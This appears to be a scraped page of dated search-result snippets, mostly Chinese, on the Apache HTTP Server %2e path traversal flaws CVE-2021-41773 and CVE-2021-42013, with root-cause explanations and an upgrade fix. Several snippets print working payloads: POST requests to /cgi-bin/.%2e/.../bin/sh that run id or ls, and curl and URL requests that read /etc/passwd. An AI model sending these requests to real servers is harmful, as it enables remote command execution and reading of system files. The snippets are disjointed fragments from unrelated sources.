2021年10月11日 · POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 echo Content-Type: text/plain; echo; id 在请求的正文下执行命令，此时漏洞产生，查看下id

2021年10月26日 · 此时%2e解码为.得到../被检测到存在../即可成功绕过对../的检测，访问到网站目录外的目录。 访问靶机的8090端口。 CVE - 2021 - 41773

2021年10月6日 · For example, %2e will be interpreted as a '.'. In Apache 2.4.49, code to normalize and validate the URL was "simplified." Likely, this caused the directory traversal issue to "sneak in."

2014年7月21日 · I have found that even if %2e is part of a URL, e.g. http://localhost/index%2ehtml, Firefox (14) and Chrome convert it to a .. This is specified in section 2.3. Later in section 3.3, it says that . and .. are for relative reference within the pathname. So, http://localhost/%2e would essentially mean http://localhost/. –

2021年10月28日 · RCE POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 echo; ls（要执行的命令） 4、修复方案 升级到最新版的Apache HTTP Server 安全版本。

2021年12月15日 · 当攻击者在 URL 中使用 /.%2e/时，第 572 行的逻辑不会将 %2e识别为句号，此时该字符尚未被解码。但该版本Apache HTTP Servers并没有在这种情况下将整体URL进行解码并匹配目录穿越过滤，导致 **/.%2e/**被 直接代入传递，导致目录穿越，具体如下

2024年10月8日 · 如果路径中存在 %2e./ 形式，程序就会检测到路径穿越符。然而，当出现 .%2e/ 或 %2e%2e/ 形式，程序就不会将其检测为路径穿越符。原因是遍历到第一个 .

2024年2月1日 · 启动Apache HTTP Server，并访问以下URL：http://localhost/test/.%2e/%2e%2e/%2e%2e/%2e%2e/test.txt 4. 如果服务器返回“HTTP/1.1 200 OK”响应，则表示漏洞存在，攻击者可以访问服务器上的任何文件。

2022年6月1日 · curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd. 成功读取

2021年10月29日 · An attacker can craft payload using URL encoding as “.%2e/” https://example.com/.%2e/.%2e/.%2e/.%2e/etc/passwd CVE-2021-42013